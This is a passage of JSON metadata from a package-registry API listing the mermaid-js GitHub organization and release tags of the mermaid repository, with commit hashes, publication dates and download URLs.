"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repo